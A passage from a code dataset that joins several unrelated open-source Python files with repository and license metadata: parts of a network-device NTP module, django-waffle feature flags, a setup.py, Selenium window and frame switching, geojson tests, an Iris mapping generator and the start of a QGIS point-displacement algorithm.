                                     source_int=if_name, server=self.address,
                                     is_preferred=self.is_preferred, key_id=key_id)
            else:
                self.proposed = dict(state=self.state, vpn_name=vpn_name,
                                     source_int=if_name, peer=self.address,
                                     is_preferred=self.is_preferred, key_id=key_id)
    def get_end_state(self):
        """Get end state info"""
        if self.address:
            self.end_state = self.get_ntp_exist_config()
    def get_update_cmd(self):
        """Build the CLI command string equivalent to the pushed change."""
        if self.conf_exsit:
            return
        cli_str = ""
        if self.state == "present":
            if self.address:
                if self.peer_type == 'Server':
                    if self.ip_ver == "IPv4":
                        cli_str = "%s %s" % (
                            "ntp unicast-server", self.address)
                    else:
                        cli_str = "%s %s" % (
                            "ntp unicast-server ipv6", self.address)
                elif self.peer_type == 'Peer':
                    if self.ip_ver == "IPv4":
                        cli_str = "%s %s" % ("ntp unicast-peer", self.address)
                    else:
                        cli_str = "%s %s" % (
                            "ntp unicast-peer ipv6", self.address)
                if self.key_id:
                    cli_str = "%s %s %s" % (
                        cli_str, "authentication-keyid", self.key_id)
                if self.interface:
                    cli_str = "%s %s %s" % (
                        cli_str, "source-interface", self.interface)
                if (self.vpn_name) and (self.vpn_name != '_public_'):
                    cli_str = "%s %s %s" % (
                        cli_str, "vpn-instance", self.vpn_name)
                if self.is_preferred == "enable":
                    cli_str = "%s %s" % (cli_str, "preferred")
        else:
            if self.address:
                if self.peer_type == 'Server':
                    if self.ip_ver == "IPv4":
                        cli_str = "%s %s" % (
                            "undo ntp unicast-server", self.address)
                    else:
                        cli_str = "%s %s" % (
                            "undo ntp unicast-server ipv6", self.address)
                elif self.peer_type == 'Peer':
                    if self.ip_ver == "IPv4":
                        cli_str = "%s %s" % (
                            "undo ntp unicast-peer", self.address)
                    else:
                        cli_str = "%s %s" % (
                            "undo ntp unicast-peer ipv6", self.address)
                if (self.vpn_name) and (self.vpn_name != '_public_'):
                    cli_str = "%s %s" % (cli_str, self.vpn_name)
        self.updates_cmd.append(cli_str)
    def work(self):
        """Execute the task: gather state, apply config, report results."""
        self.get_existing()
        self.get_proposed()
        self.config_ntp()
        self.get_update_cmd()
        self.get_end_state()
        self.show_result()
def main():
    """Entry point: assemble the argument spec and run the NTP task."""
    spec = {
        'server': dict(type='str'),
        'peer': dict(type='str'),
        'key_id': dict(type='str'),
        'is_preferred': dict(type='str', choices=['enable', 'disable']),
        'vpn_name': dict(type='str', default='_public_'),
        'source_int': dict(type='str'),
        'state': dict(choices=['absent', 'present'], default='present'),
    }
    # Fold in the common CloudEngine connection arguments.
    spec.update(ce_argument_spec)
    Ntp(spec).work()
if __name__ == '__main__':
    main()
| gpl-3.0 |
styleseat/django-waffle | waffle/__init__.py | 1 | 3408 | from decimal import Decimal
import random
import django
from waffle.utils import get_setting
# Package version as a tuple of ints, and its dotted-string form
# (e.g. "0.10.1") exposed as __version__.
VERSION = (0, 10, 1)
__version__ = '.'.join(map(str, VERSION))
def set_flag(request, flag_name, active=True, session_only=False):
    """Record a flag decision on the request as [active, session_only]."""
    try:
        store = request.waffles
    except AttributeError:
        # First flag set on this request: lazily create the store.
        store = request.waffles = {}
    store[flag_name] = [active, session_only]
def flag_is_active(request, flag_name):
    """Return True when the named waffle flag is active for *request*.

    Checks, in order: flag existence (falls back to FLAG_DEFAULT), GET
    override, the everyone switch, testing mode, user attributes
    (authenticated/staff/superuser), language, explicit user/group
    membership, and finally percentage rollout (sticky via request
    attribute and cookie).
    """
    from .models import Flag, get_flag_group_ids, get_flag_user_ids
    try:
        flag = Flag.objects.get(name=flag_name)
    except Flag.DoesNotExist:
        return get_setting('FLAG_DEFAULT')
    # Query-string override, e.g. ?flag_name=1, when OVERRIDE is enabled.
    if get_setting('OVERRIDE'):
        if flag_name in request.GET:
            return request.GET[flag_name] == '1'
    # flag.everyone is a nullable boolean: True/False force the outcome,
    # None falls through to the finer-grained checks below.
    if flag.everyone:
        return True
    elif flag.everyone is False:
        return False
    if flag.testing:  # Testing mode is on.
        tc = get_setting('TEST_COOKIE') % flag_name
        if tc in request.GET:
            on = request.GET[tc] == '1'
            if not hasattr(request, 'waffle_tests'):
                request.waffle_tests = {}
            request.waffle_tests[flag_name] = on
            return on
        if tc in request.COOKIES:
            return request.COOKIES[tc] == 'True'
    user = request.user
    # NOTE(review): is_authenticated is called as a method -- this targets
    # old Django where it was callable; on modern Django it is a property.
    if flag.authenticated and user.is_authenticated():
        return True
    if flag.staff and user.is_staff:
        return True
    if flag.superusers and user.is_superuser:
        return True
    if flag.languages:
        languages = flag.languages.split(',')
        if (hasattr(request, 'LANGUAGE_CODE') and
                request.LANGUAGE_CODE in languages):
            return True
    flag_user_ids = get_flag_user_ids(flag)
    if user.id in flag_user_ids:
        return True
    flag_group_ids = get_flag_group_ids(flag)
    if len(flag_group_ids) > 0:
        try:
            user_group_ids = set(user.groups.all().values_list('id', flat=True))
        except AttributeError:
            # Presumably anonymous users without .groups on Django <= 1.5;
            # on anything newer the AttributeError is re-raised.
            django_version = django.VERSION
            if django_version[0] != 1 or django_version[1] > 5:
                raise
        else:
            if len(user_group_ids & flag_group_ids) > 0:
                return True
    if flag.percent and flag.percent > 0:
        # Sticky per-request/per-cookie rollout: reuse a prior decision
        # before rolling the dice again.
        if not hasattr(request, 'waffles'):
            request.waffles = {}
        elif flag_name in request.waffles:
            return request.waffles[flag_name][0]
        cookie = get_setting('COOKIE') % flag_name
        if cookie in request.COOKIES:
            flag_active = (request.COOKIES[cookie] == 'True')
            set_flag(request, flag_name, flag_active, flag.rollout)
            return flag_active
        if Decimal(str(random.uniform(0, 100))) <= flag.percent:
            set_flag(request, flag_name, True, flag.rollout)
            return True
        set_flag(request, flag_name, False, flag.rollout)
        return False
def switch_is_active(switch_name):
    """Return the active state of the named switch, or SWITCH_DEFAULT
    when no such switch exists."""
    from .models import Switch
    try:
        switch = Switch.objects.get(name=switch_name)
    except Switch.DoesNotExist:
        return get_setting('SWITCH_DEFAULT')
    return switch.active
def sample_is_active(sample_name):
    """Roll against the named sample's percentage; missing samples fall
    back to SAMPLE_DEFAULT."""
    from .models import Sample
    try:
        sample = Sample.objects.get(name=sample_name)
    except Sample.DoesNotExist:
        return get_setting('SAMPLE_DEFAULT')
    roll = Decimal(str(random.uniform(0, 100)))
    return roll <= sample.percent
| bsd-3-clause |
googleapis/python-documentai | setup.py | 1 | 2078 | # -*- coding: utf-8 -*-
# Copyright (C) 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import io
import os
import setuptools  # type: ignore
# Package version; bump here for releases.
version = "0.5.0"
package_root = os.path.abspath(os.path.dirname(__file__))
# Use README.rst verbatim as the PyPI long description.
readme_filename = os.path.join(package_root, "README.rst")
with io.open(readme_filename, encoding="utf-8") as readme_file:
    readme = readme_file.read()
setuptools.setup(
    name="google-cloud-documentai",
    version=version,
    long_description=readme,
    author="Google LLC",
    author_email="googleapis-packages@google.com",
    license="Apache 2.0",
    url="https://github.com/googleapis/python-documentai",
    # Only ship the google.* namespace packages discovered in the tree.
    packages=[
        package
        for package in setuptools.PEP420PackageFinder.find()
        if package.startswith("google")
    ],
    namespace_packages=("google", "google.cloud"),
    platforms="Posix; MacOS X; Windows",
    include_package_data=True,
    install_requires=(
        "google-api-core[grpc] >= 1.22.2, < 2.0.0dev",
        "proto-plus >= 1.10.0",
        "packaging >= 14.3",
    ),
    python_requires=">=3.6",
    setup_requires=["libcst >= 0.2.5"],
    classifiers=[
        "Development Status :: 5 - Production/Stable",
        "Intended Audience :: Developers",
        "Operating System :: OS Independent",
        "Programming Language :: Python :: 3.6",
        "Programming Language :: Python :: 3.7",
        "Programming Language :: Python :: 3.8",
        "Topic :: Internet",
        "Topic :: Software Development :: Libraries :: Python Modules",
    ],
    zip_safe=False,
)
| apache-2.0 |
agentmilindu/stratos | components/org.apache.stratos.python.cartridge.agent/src/main/python/cartridge.agent/cartridge.agent/modules/healthstatspublisher/abstracthealthstatisticspublisher.py | 2 | 1992 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
class AbstractHealthStatisticsReader:
    """Base class for plugging in a custom health statistics reader."""

    def stat_cartridge_health(self):
        """Collect memory usage and load average for this instance.

        Subclasses must override this to read the instance's memory
        usage and load average and return them wrapped in a
        CartridgeHealthStatistics object.

        :return: CartridgeHealthStatistics with memory usage and load average values
        :rtype: CartridgeHealthStatistics
        """
        raise NotImplementedError
class CartridgeHealthStatistics:
    """Value holder for one health reading: memory usage and load average."""

    def __init__(self):
        # Both readings start unset; a reader implementation fills them in.
        self.memory_usage = None  # expected type: float
        self.load_avg = None  # expected type: float
class CEPPublisherException(Exception):
    """Raised when a CEP publishing operation fails."""

    def __init__(self, msg):
        super(CEPPublisherException, self).__init__(msg)
        # Keep the message on an attribute for get_message().
        self.message = msg

    def get_message(self):
        """Return the message supplied when the exception was raised.

        :return: message
        :rtype: str
        """
        return self.message
| apache-2.0 |
brandonxiang/geojson-python-utils | test.py | 1 | 5920 | from __future__ import print_function
import unittest
import json
import math
class Test(unittest.TestCase):
    """Unit tests for geojson_utils; several cases read fixture files
    from the tests/ directory."""
    def test_linestrings_intersect(self):
        from geojson_utils import linestrings_intersect
        diagonal_up_str = '{ "type": "LineString","coordinates": [[0, 0], [10, 10]]}'
        diagonal_down_str = '{ "type": "LineString","coordinates": [[10, 0], [0, 10]]}'
        far_away_str = '{ "type": "LineString","coordinates": [[100, 100], [110, 110]]}'
        diagonal_up = json.loads(diagonal_up_str)
        diagonal_down = json.loads(diagonal_down_str)
        far_away = json.loads(far_away_str)
        # Crossing diagonals meet at (5, 5); disjoint lines yield [].
        self.assertEqual(linestrings_intersect(diagonal_up, diagonal_down), [{'type': 'Point', 'coordinates': [5, 5]}])
        self.assertEqual(linestrings_intersect(diagonal_up, far_away), [])
    def test_point_in_polygon(self):
        from geojson_utils import point_in_polygon
        in_str = '{"type": "Point", "coordinates": [5, 5]}'
        out_str = '{"type": "Point", "coordinates": [15, 15]}'
        box_str = '{"type": "Polygon","coordinates": [[ [0, 0], [10, 0], [10, 10], [0, 10] ]]}'
        in_box = json.loads(in_str)
        out_box = json.loads(out_str)
        box = json.loads(box_str)
        self.assertTrue(point_in_polygon(in_box, box))
        self.assertFalse(point_in_polygon(out_box, box))
    def test_point_in_multipolygon(self):
        from geojson_utils import point_in_multipolygon
        point_str = '{"type": "Point", "coordinates": [0.5, 0.5]}'
        single_point_str = '{"type": "Point", "coordinates": [-1, -1]}'
        multipoly_str = '{"type":"MultiPolygon","coordinates":[[[[0,0],[0,10],[10,10],[10,0],[0,0]]],[[[10,10],[10,20],[20,20],[20,10],[10,10]]]]}'
        point = json.loads(point_str)
        single_point = json.loads(single_point_str)
        multipoly = json.loads(multipoly_str)
        self.assertTrue(point_in_multipolygon(point, multipoly))
        self.assertFalse(point_in_multipolygon(single_point, multipoly))
    def test_drawCircle(self):
        from geojson_utils import draw_circle
        pt_center = json.loads('{"type": "Point", "coordinates": [0, 0]}')
        # Default ring resolution is 15 points; an explicit count is honoured.
        self.assertEqual(
            len(draw_circle(10, pt_center)['coordinates'][0]), 15)
        self.assertEqual(
            len(draw_circle(10, pt_center, 50)['coordinates'][0]), 50)
    def test_rectangle_centroid(self):
        from geojson_utils import rectangle_centroid
        box_str = '{"type": "Polygon","coordinates": [[[0, 0],[10, 0],[10, 10],[0, 10]]]}'
        box = json.loads(box_str)
        centroid = rectangle_centroid(box)
        self.assertEqual(centroid['coordinates'], [5, 5])
    def test_point_distance(self):
        from geojson_utils import point_distance
        fairyland_str = '{"type": "Point", "coordinates": [-122.260000705719, 37.80919060818706]}'
        navalbase_str = '{"type": "Point", "coordinates": [-122.32083320617676, 37.78774223089045]}'
        fairyland = json.loads(fairyland_str)
        navalbase = json.loads(navalbase_str)
        self.assertEqual(math.floor(
            point_distance(fairyland, navalbase)), 5852)
    def test_geometry_radius(self):
        from geojson_utils import geometry_within_radius
        center_point_str = '{"type": "Point", "coordinates": [-122.260000705719, 37.80919060818706]}'
        check_point_str = '{"type": "Point", "coordinates": [-122.32083320617676, 37.78774223089045]}'
        center_point = json.loads(center_point_str)
        check_point = json.loads(check_point_str)
        # 5853 is just above the spherical distance asserted above (5852.x).
        self.assertTrue(geometry_within_radius(check_point, center_point, 5853))
    def test_area(self):
        from geojson_utils import area
        box_str = '{"type": "Polygon","coordinates": [[ [0, 0], [10, 0], [10, 10], [0, 10] ]]}'
        box = json.loads(box_str)
        self.assertEqual(area(box), 100)
    def test_centroid(self):
        from geojson_utils import centroid
        box_str = '{"type": "Polygon","coordinates": [[ [0, 0], [10, 0], [10, 10], [0, 10] ]]}'
        box = json.loads(box_str)
        self.assertEqual(centroid(box), {"type": "Point", "coordinates": [5, 5]})
    def test_destination_point(self):
        from geojson_utils import destination_point
        startpoint_str = '{"type": "Point", "coordinates": [-122.260000705719, 37.80919060818706]}'
        startpoint = json.loads(startpoint_str)
        # Bearing 180 (due south) should leave longitude essentially unchanged.
        self.assertEqual(destination_point(startpoint, 180, 2000)["coordinates"][0], -122.26000070571902)
    def test_distance_ellipsode(self):
        from geojson_utils import point_distance_ellipsode
        fairyland_str = '{"type": "Point", "coordinates": [-122.260000705719, 37.80919060818706]}'
        navalbase_str = '{"type": "Point", "coordinates": [-122.32083320617676, 37.78774223089045]}'
        fairyland = json.loads(fairyland_str)
        navalbase = json.loads(navalbase_str)
        # NOTE(review): 2380 differs markedly from the spherical result
        # (5852) for the same two points -- confirm the ellipsoidal
        # function's units/algorithm before trusting this expected value.
        self.assertAlmostEqual(math.floor(point_distance_ellipsode(fairyland,navalbase)),2380)
    def test_featurecollection(self):
        from geojson_utils import merge_featurecollection
        with open('tests/first.json','r') as fp:
            first = json.load(fp)
        with open('tests/second.json','r') as fp:
            second = json.load(fp)
        with open('tests/result.json','r') as fp:
            result = json.load(fp)
        self.assertEqual(merge_featurecollection(first,second), result)
    def test_convertor(self):
        from geojson_utils import convertor
        with open('tests/province_wgs.geojson', encoding='utf-8') as fp:
            geojson = json.load(fp)
        features = geojson['features']
        for feature in features:
            # Conversion should shift the first coordinate of every feature.
            origin = feature['geometry']['coordinates'][0][0][0]
            result = convertor(feature['geometry'])
            self.assertNotEqual(origin,result['coordinates'][0][0][0])
if __name__ == '__main__':
    unittest.main()
| mit |
krmahadevan/selenium | py/selenium/webdriver/remote/switch_to.py | 13 | 4610 | # Licensed to the Software Freedom Conservancy (SFC) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The SFC licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from .command import Command
from selenium.webdriver.common.alert import Alert
from selenium.webdriver.common.by import By
from selenium.common.exceptions import NoSuchElementException, NoSuchFrameException, NoSuchWindowException
try:
    basestring
except NameError:
    # Python 3 has no ``basestring``; alias it to ``str`` so the
    # isinstance() check in SwitchTo.frame works on both major versions.
    basestring = str
class SwitchTo:
    # Bound to a WebDriver as ``driver.switch_to``; moves the driver's
    # focus between elements, frames, windows and alerts.
    def __init__(self, driver):
        self._driver = driver
    @property
    def active_element(self):
        """
        Returns the element with focus, or BODY if nothing has focus.
        :Usage:
            element = driver.switch_to.active_element
        """
        # W3C-compliant remote ends use a dedicated endpoint.
        if self._driver.w3c:
            return self._driver.execute(Command.W3C_GET_ACTIVE_ELEMENT)['value']
        else:
            return self._driver.execute(Command.GET_ACTIVE_ELEMENT)['value']
    @property
    def alert(self):
        """
        Switches focus to an alert on the page.
        :Usage:
            alert = driver.switch_to.alert
        """
        alert = Alert(self._driver)
        # Touch .text eagerly so that a missing alert raises here rather
        # than on a later access -- presumably an intentional presence check.
        alert.text
        return alert
    def default_content(self):
        """
        Switch focus to the default frame.
        :Usage:
            driver.switch_to.default_content()
        """
        # A null frame id means the top-level browsing context.
        self._driver.execute(Command.SWITCH_TO_FRAME, {'id': None})
    def frame(self, frame_reference):
        """
        Switches focus to the specified frame, by index, name, or webelement.
        :Args:
         - frame_reference: The name of the window to switch to, an integer representing the index,
                            or a webelement that is an (i)frame to switch to.
        :Usage:
            driver.switch_to.frame('frame_name')
            driver.switch_to.frame(1)
            driver.switch_to.frame(driver.find_elements_by_tag_name("iframe")[0])
        """
        # W3C endpoints only accept index or element references, so a
        # string is first resolved to the frame element by id, then name.
        if isinstance(frame_reference, basestring) and self._driver.w3c:
            try:
                frame_reference = self._driver.find_element(By.ID, frame_reference)
            except NoSuchElementException:
                try:
                    frame_reference = self._driver.find_element(By.NAME, frame_reference)
                except NoSuchElementException:
                    raise NoSuchFrameException(frame_reference)
        self._driver.execute(Command.SWITCH_TO_FRAME, {'id': frame_reference})
    def parent_frame(self):
        """
        Switches focus to the parent context. If the current context is the top
        level browsing context, the context remains unchanged.
        :Usage:
            driver.switch_to.parent_frame()
        """
        self._driver.execute(Command.SWITCH_TO_PARENT_FRAME)
    def window(self, window_name):
        """
        Switches focus to the specified window.
        :Args:
         - window_name: The name or window handle of the window to switch to.
        :Usage:
            driver.switch_to.window('main')
        """
        if self._driver.w3c:
            self._w3c_window(window_name)
            return
        data = {'name': window_name}
        self._driver.execute(Command.SWITCH_TO_WINDOW, data)
    def _w3c_window(self, window_name):
        # W3C remote ends address windows by handle only; emulate the
        # legacy by-name lookup by probing each handle for a matching
        # window.name.
        def send_handle(h):
            self._driver.execute(Command.SWITCH_TO_WINDOW, {'handle': h})
        try:
            # Try using it as a handle first.
            send_handle(window_name)
        except NoSuchWindowException as e:
            # Check every window to try to find the given window name.
            original_handle = self._driver.current_window_handle
            handles = self._driver.window_handles
            for handle in handles:
                send_handle(handle)
                current_name = self._driver.execute_script('return window.name')
                if window_name == current_name:
                    return
            # No match: restore the original window and re-raise.
            send_handle(original_handle)
            raise e
| apache-2.0 |
bjlittle/iris | tools/gen_translations.py | 6 | 7503 | # Copyright Iris contributors
#
# This file is part of Iris and is released under the LGPL license.
# See COPYING and COPYING.LESSER in the root of the repository for full
# licensing details.
"""
Processing of metarelate metOcean content to provide Iris encodings of
metOcean mapping translations.
"""
from datetime import datetime
import os.path
import requests
import sys
import metarelate
from metarelate.fuseki import FusekiServer
from translator import (FORMAT_URIS, FieldcodeCFMappings, StashCFNameMappings,
StashCFHeightConstraintMappings,
CFFieldcodeMappings,
GRIB1LocalParamCFConstrainedMappings,
GRIB1LocalParamCFMappings, GRIB2ParamCFMappings,
CFConstrainedGRIB1LocalParamMappings,
CFGRIB2ParamMappings, CFGRIB1LocalParamMappings)
HEADER = """# Copyright {name} contributors
#
# This file is part of {name} and is released under the LGPL license.
# See COPYING and COPYING.LESSER in the root of the repository for full
# licensing details.
#
# DO NOT EDIT: AUTO-GENERATED
# Created on {datestamp} from
# http://www.metarelate.net/metOcean
# at commit {git_sha}
# https://github.com/metarelate/metOcean/commit/{git_sha}
{doc_string}
from collections import namedtuple
CFName = namedtuple('CFName', 'standard_name long_name units')
"""
HEADER_GRIB = """
DimensionCoordinate = namedtuple('DimensionCoordinate',
'standard_name units points')
G1LocalParam = namedtuple('G1LocalParam', 'edition t2version centre iParam')
G2Param = namedtuple('G2Param', 'edition discipline category number')
"""
DOC_STRING_GRIB = r'''"""
Provides GRIB/CF phenomenon translations.
"""'''
DOC_STRING_UM = r'''"""
Provides UM/CF phenomenon translations.
"""'''
YEAR = datetime.utcnow().year
def _retrieve_mappings(fuseki, source, target):
"""
Interrogate the metarelate triple store for all
phenomenon translation mappings from the source
scheme to the target scheme.
Args:
* fuseki:
The :class:`metrelate.fuseki.FusekiServer` instance.
* source:
The source metarelate metadata type for the mapping.
* target:
The target metarelate metadata type for the mapping.
Return:
The sequence of :class:`metarelate.Mapping`
instances.
"""
suri = 'http://www.metarelate.net/sparql/metOcean'
msg = 'Retrieving {!r} to {!r} mappings ...'
print(msg.format(source, target))
return fuseki.retrieve_mappings(source, target, service=suri)
def build_um_cf_map(fuseki, now, git_sha, base_dir):
    """
    Encode the UM/CF phenomenon translation mappings
    within the generated ``lib/iris/fileformats/um_cf_map.py`` file.

    Args:
    * fuseki:
        The :class:`metarelate.fuseki.FusekiServer` instance.
    * now:
        Time stamp to write into the file
    * git_sha:
        The git SHA1 of the metarelate commit
    * base_dir:
        The root directory of the Iris source.

    """
    filename = os.path.join(base_dir, 'lib', 'iris', 'fileformats',
                            'um_cf_map.py')
    # Create the base directory.
    if not os.path.exists(os.path.dirname(filename)):
        os.makedirs(os.path.dirname(filename))
    # Create the file to contain UM/CF translations.
    with open(filename, 'w') as fh:
        # NOTE(review): HEADER only declares {name}/{datestamp}/{git_sha}/
        # {doc_string} placeholders, so the year= argument appears unused.
        fh.write(HEADER.format(year=YEAR, doc_string=DOC_STRING_UM,
                               datestamp=now, git_sha=git_sha, name='Iris'))
        fh.write('\n')
        # Encode the relevant UM to CF translations.
        maps = _retrieve_mappings(fuseki, FORMAT_URIS['umf'],
                                  FORMAT_URIS['cff'])
        # create the collections, then call lines on each one
        # for thread safety during lines and encode
        fccf = FieldcodeCFMappings(maps)
        stcf = StashCFNameMappings(maps)
        stcfhcon = StashCFHeightConstraintMappings(maps)
        fh.writelines(fccf.lines(fuseki))
        fh.writelines(stcf.lines(fuseki))
        fh.writelines(stcfhcon.lines(fuseki))
        # Encode the relevant CF to UM translations.
        maps = _retrieve_mappings(fuseki, FORMAT_URIS['cff'],
                                  FORMAT_URIS['umf'])
        # create the collections, then call lines on each one
        # for thread safety during lines and encode
        cffc = CFFieldcodeMappings(maps)
        fh.writelines(cffc.lines(fuseki))
def build_grib_cf_map(fuseki, now, git_sha, base_dir):
    """
    Encode the GRIB/CF phenomenon translation mappings
    within the specified file.

    Generates ``lib/iris/fileformats/grib/_grib_cf_map.py`` under
    *base_dir*, creating intermediate directories as required.  The file
    is written with a licence/provenance header (plus the GRIB-specific
    header) followed by the GRIB->CF and CF->GRIB mapping dictionaries.

    Args:
    * fuseki:
        The :class:`metarelate.fuseki.FusekiServer` instance.
    * now:
        Time stamp to write into the file
    * git_sha:
        The git SHA1 of the metarelate commit
    * base_dir:
        The root directory of the Iris source.

    """
    filename = os.path.join(base_dir, 'lib', 'iris', 'fileformats',
                            'grib', '_grib_cf_map.py')
    # Create the base directory.
    if not os.path.exists(os.path.dirname(filename)):
        os.makedirs(os.path.dirname(filename))
    # Create the file to contain GRIB/CF translations.
    with open(filename, 'w') as fh:
        fh.write(HEADER.format(year=YEAR, doc_string=DOC_STRING_GRIB,
                               datestamp=now, git_sha=git_sha,
                               name='iris-grib'))
        fh.write(HEADER_GRIB)
        fh.write('\n')
        # Encode the relevant GRIB to CF translations.
        maps = _retrieve_mappings(fuseki, FORMAT_URIS['gribm'],
                                  FORMAT_URIS['cff'])
        # create the collections, then call lines on each one
        # for thread safety during lines and encode
        g1cfc = GRIB1LocalParamCFConstrainedMappings(maps)
        g1c = GRIB1LocalParamCFMappings(maps)
        g2c = GRIB2ParamCFMappings(maps)
        fh.writelines(g1cfc.lines(fuseki))
        fh.writelines(g1c.lines(fuseki))
        fh.writelines(g2c.lines(fuseki))
        # Encode the relevant CF to GRIB translations.
        maps = _retrieve_mappings(fuseki, FORMAT_URIS['cff'],
                                  FORMAT_URIS['gribm'])
        # create the collections, then call lines on each one
        # for thread safety during lines and encode
        cfcg1 = CFConstrainedGRIB1LocalParamMappings(maps)
        cg1 = CFGRIB1LocalParamMappings(maps)
        cg2 = CFGRIB2ParamMappings(maps)
        fh.writelines(cfcg1.lines(fuseki))
        fh.writelines(cg1.lines(fuseki))
        fh.writelines(cg2.lines(fuseki))
def main():
    """Regenerate the Iris translation modules (um_cf_map.py and
    _grib_cf_map.py) from the metarelate translation store.

    Raises ValueError if the installed metarelate is too old, or if the
    remote store changed while the mappings were being retrieved.
    """
    # Protect metarelate resource from 1.0 emergent bug.
    # Compare (major, minor) numerically: the previous float() comparison
    # raised on versions such as '1.1.2' and misordered '1.10' vs '1.2'.
    version = tuple(int(part) for part in
                    metarelate.__version__.split('.')[:2])
    if not version >= (1, 1):
        raise ValueError("Please ensure that Metarelate Version is >= 1.1")
    # '%H:%M' is hours:minutes -- the previous '%H:%m' embedded the month
    # number in place of the minutes.
    now = datetime.utcnow().strftime('%d %B %Y %H:%M')
    git_sha = requests.get('http://www.metarelate.net/metOcean/latest_sha').text
    gen_path = os.path.abspath(sys.modules['__main__'].__file__)
    iris_path = os.path.dirname(os.path.dirname(gen_path))
    with FusekiServer() as fuseki:
        build_um_cf_map(fuseki, now, git_sha, iris_path)
        build_grib_cf_map(fuseki, now, git_sha, iris_path)
    # Guard against the remote store mutating mid-run; the generated
    # modules would otherwise mix two different snapshots.
    if (git_sha !=
            requests.get('http://www.metarelate.net/metOcean/latest_sha').text):
        raise ValueError('The metarelate translation store has altered during'
                         ' your retrieval, the results may not be stable.\n'
                         'Please rerun your retrieval.')
# Script entry point: regenerate the translation modules in-place.
if __name__ == '__main__':
    main()
| lgpl-3.0 |
timlinux/QGIS | python/plugins/processing/algs/qgis/PointsDisplacement.py | 30 | 7999 | # -*- coding: utf-8 -*-
"""
***************************************************************************
PointsDisplacement.py
---------------------
Date : July 2013
Copyright : (C) 2013 by Alexander Bruy
Email : alexander dot bruy at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Alexander Bruy'
__date__ = 'July 2013'
__copyright__ = '(C) 2013, Alexander Bruy'
import math
from qgis.core import (QgsFeatureSink,
QgsGeometry,
QgsPointXY,
QgsSpatialIndex,
QgsRectangle,
QgsProcessing,
QgsProcessingException,
QgsProcessingParameterFeatureSource,
QgsProcessingParameterDistance,
QgsProcessingParameterBoolean,
QgsProcessingParameterFeatureSink)
from processing.algs.qgis.QgisAlgorithm import QgisAlgorithm
class PointsDisplacement(QgisAlgorithm):
    """Processing algorithm that radially displaces clustered points so
    every member of a cluster of (near-)coincident points becomes
    individually visible.

    NOTE: the clustering logic is a Python port of the C++
    QgsPointDistanceRenderer; see the comment in processAlgorithm()
    before changing it.
    """

    # Parameter / output identifiers used by the processing framework.
    INPUT = 'INPUT'
    DISTANCE = 'DISTANCE'
    PROXIMITY = 'PROXIMITY'
    HORIZONTAL = 'HORIZONTAL'
    OUTPUT = 'OUTPUT'

    def group(self):
        """Return the localised display group for this algorithm."""
        return self.tr('Vector geometry')

    def groupId(self):
        """Return the stable (non-localised) group identifier."""
        return 'vectorgeometry'

    def __init__(self):
        super().__init__()

    def initAlgorithm(self, config=None):
        """Declare the input layer, proximity threshold, displacement
        radius, two-point layout flag, and the output sink."""
        self.addParameter(QgsProcessingParameterFeatureSource(self.INPUT,
                                                              self.tr('Input layer'), [QgsProcessing.TypeVectorPoint]))
        self.addParameter(QgsProcessingParameterDistance(self.PROXIMITY,
                                                         self.tr('Minimum distance to other points'), parentParameterName='INPUT',
                                                         minValue=0.00001, defaultValue=1.0))
        self.addParameter(QgsProcessingParameterDistance(self.DISTANCE,
                                                         self.tr('Displacement distance'), parentParameterName='INPUT',
                                                         minValue=0.00001, defaultValue=1.0))
        self.addParameter(QgsProcessingParameterBoolean(self.HORIZONTAL,
                                                        self.tr('Horizontal distribution for two point case')))
        self.addParameter(QgsProcessingParameterFeatureSink(self.OUTPUT, self.tr('Displaced'), QgsProcessing.TypeVectorPoint))

    def name(self):
        """Return the stable algorithm identifier."""
        return 'pointsdisplacement'

    def displayName(self):
        """Return the localised algorithm name."""
        return self.tr('Points displacement')

    def processAlgorithm(self, parameters, context, feedback):
        """Cluster input points by proximity, then write each cluster's
        members spread evenly on a circle of the displacement radius
        around the cluster centre.

        Raises QgsProcessingException on an invalid source or sink.
        """
        source = self.parameterAsSource(parameters, self.INPUT, context)
        if source is None:
            raise QgsProcessingException(self.invalidSourceError(parameters, self.INPUT))

        proximity = self.parameterAsDouble(parameters, self.PROXIMITY, context)
        radius = self.parameterAsDouble(parameters, self.DISTANCE, context)
        horizontal = self.parameterAsBoolean(parameters, self.HORIZONTAL, context)

        (sink, dest_id) = self.parameterAsSink(parameters, self.OUTPUT, context,
                                               source.fields(), source.wkbType(), source.sourceCrs())
        if sink is None:
            raise QgsProcessingException(self.invalidSinkError(parameters, self.OUTPUT))

        features = source.getFeatures()

        total = 100.0 / source.featureCount() if source.featureCount() else 0

        def searchRect(p):
            # Square search window of half-width `proximity` centred on p.
            return QgsRectangle(p.x() - proximity, p.y() - proximity, p.x() + proximity, p.y() + proximity)

        index = QgsSpatialIndex()

        # NOTE: this is a Python port of QgsPointDistanceRenderer::renderFeature. If refining this algorithm,
        # please port the changes to QgsPointDistanceRenderer::renderFeature also!

        # Phase 1: greedy clustering.  A point either seeds a new cluster
